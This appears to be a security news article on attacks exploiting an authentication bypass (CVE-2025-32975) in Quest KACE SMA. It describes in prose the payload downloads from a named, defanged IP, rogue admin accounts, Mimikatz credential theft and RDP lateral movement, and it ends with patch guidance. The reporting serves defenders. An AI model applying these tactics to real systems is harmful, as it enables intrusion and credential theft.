Cybersecurity researchers have identified active exploitation of a critical security flaw affecting Quest KACE Systems Management Appliance (SMA), raising serious concerns for organizations relying on the platform.
According to recent findings from Arctic Wolf, suspicious activity linked to this vulnerability began emerging during the week of March 9, 2026. The attacks specifically target SMA systems that remain unpatched and are directly accessible via the internet. At this stage, the exact objectives behind these attacks remain unclear, but the level of access gained suggests high-risk consequences.
Authentication Bypass Enables Full System Control
The vulnerability, tracked as CVE-2025-32975 with a CVSS score of 10.0, is classified as a critical authentication bypass issue. This flaw allows attackers to gain unauthorized access by impersonating legitimate users without requiring valid login credentials.
Once exploited, attackers can take full control of administrative accounts, effectively compromising the entire system. Although a security patch was released in May 2025, systems that have not been updated remain highly vulnerable.
Attack Method and Payload Deployment
Threat actors are believed to be leveraging this flaw to execute remote commands on compromised systems. Investigations indicate that attackers are using curl commands to download Base64-encoded payloads from an external server identified as 216.126.225[.]156.
This technique allows attackers to quietly introduce malicious code while avoiding immediate detection.
Persistence and Privilege Expansion Techniques
Following initial access, attackers deploy additional strategies to maintain control and expand their reach within the system:
- Creation of new administrative accounts using a background process linked to the SMA Agent
- Execution of scripts through a process known as “runkbot.exe”
- Modification of Windows Registry settings via PowerShell scripts, likely to ensure persistence or alter system configurations
Advanced Post-Exploitation Activities
Further analysis reveals that attackers are performing multiple post-exploitation operations to strengthen their foothold:
- Credential extraction using widely known tools such as Mimikatz
- System reconnaissance by identifying active users and administrative groups
- Execution of network commands like “net time” and “net group” for environment mapping
- Gaining Remote Desktop Protocol (RDP) access to critical infrastructure, including backup systems and domain controllers
These activities indicate a structured and potentially long-term attack strategy.
Mitigation and Security Recommendations
Security experts strongly advise organizations to take immediate action to reduce risk exposure:
- Update all SMA systems to the latest patched versions
- Avoid exposing management appliances directly to the internet
- Monitor systems for unusual administrative activity and unauthorized account creation
The vulnerability has been resolved in updated versions, including:
- 13.0.385
- 13.1.81
- 13.2.183
- 14.0.341 (Patch 5)
- 14.1.101 (Patch 4)
Organizations that delay patching remain at significant risk of compromise.
Found this article interesting? Follow us on X (Twitter) , Facebook, Blue sky and LinkedIn to read more exclusive content we post.
